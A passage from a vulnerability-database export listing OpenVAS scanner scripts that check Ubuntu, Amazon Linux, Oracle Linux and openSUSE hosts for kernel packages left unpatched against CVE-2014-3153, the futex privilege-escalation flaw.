isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~3.8.13~35.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~3.8.13~35.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~3.8.13~35.1.1.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-06-09T00:00:00", "id": "OPENVAS:1361412562310841845", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841845", "type": "openvas", "title": "Ubuntu Update for linux-lts-quantal USN-2237-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2237_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-quantal USN-2237-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841845\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-09 14:35:15 +0530 (Mon, 09 Jun 2014)\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-lts-quantal USN-2237-1\");\n\n script_tag(name:\"affected\", value:\"linux-lts-quantal on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"Pinkie Pie discovered a flaw in the Linux kernel's futex\nsubsystem. An unprivileged local user could exploit this flaw to cause a denial\nof service (system crash) or gain administrative privileges.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2237-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2237-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-quantal'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-51-generic\", ver:\"3.5.0-51.77~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T23:00:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120340", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120340", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-363)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120340\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:24:01 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-363)\");\n script_tag(name:\"insight\", value:\"The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.\");\n script_tag(name:\"solution\", value:\"Run yum update kernel to update your system. You will need to reboot your system in order for the new kernel to be running.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-363.html\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~3.10.42~52.145.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.42~52.145.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.10.42~52.145.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.42~52.145.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.42~52.145.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.42~52.145.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.42~52.145.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "Oracle Linux Local Security Checks ELSA-2014-3038", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123398", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3038", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3038.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123398\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:03:17 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3038\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3038 - unbreakable enterprise kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3038\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3038.html\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.39~400.215.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.39~400.215.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.39~400.215.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.39~400.215.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.39~400.215.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.39~400.215.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.39~400.215.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.39~400.215.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.39~400.215.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.39~400.215.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.39~400.215.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.39~400.215.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "Oracle Linux Local Security Checks ELSA-2014-3039", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123399", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123399", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3039", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3039.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123399\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:03:18 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3039\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3039 - Unbreakable Enterprise kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3039\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3039.html\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.32~400.36.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.32~400.36.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.32~400.36.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.32~400.36.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.32~400.36.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.32~400.36.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-headers\", rpm:\"kernel-uek-headers~2.6.32~400.36.2.el5uek\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.2.el5uek~1.5.7~2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.2.el5uekdebug~1.5.7~2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.2.el5uek~1.5.1~4.0.58\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.2.el5uekdebug~1.5.1~4.0.58\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~2.6.32~400.36.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~2.6.32~400.36.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~2.6.32~400.36.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~2.6.32~400.36.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~2.6.32~400.36.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~2.6.32~400.36.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-headers\", rpm:\"kernel-uek-headers~2.6.32~400.36.2.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.2.el6uek~1.5.7~0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mlnx_en\", rpm:\"mlnx_en~2.6.32~400.36.2.el6uekdebug~1.5.7~0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.2.el6uek~1.5.1~4.0.58\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ofa\", rpm:\"ofa~2.6.32~400.36.2.el6uekdebug~1.5.1~4.0.58\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2014-07-15T00:00:00", "id": "OPENVAS:1361412562310850595", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850595", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2014:0878-1)", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850595\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-07-15 16:38:28 +0530 (Tue, 15 Jul 2014)\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2014:0878-1)\");\n\n script_tag(name:\"affected\", value:\"kernel on openSUSE 11.4\");\n\n script_tag(name:\"insight\", value:\"kernel update for Evergreen 11.4 fixes local privilege escalation in futex\n code (bnc#880892 / CVE-2014-3153) and a regression causing a crash if\n IPsec peer is unavailable\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:0878-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.4\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-hmac\", rpm:\"kernel-debug-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel-debuginfo\", rpm:\"kernel-default-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-hmac\", rpm:\"kernel-default-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel-debuginfo\", rpm:\"kernel-desktop-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-hmac\", 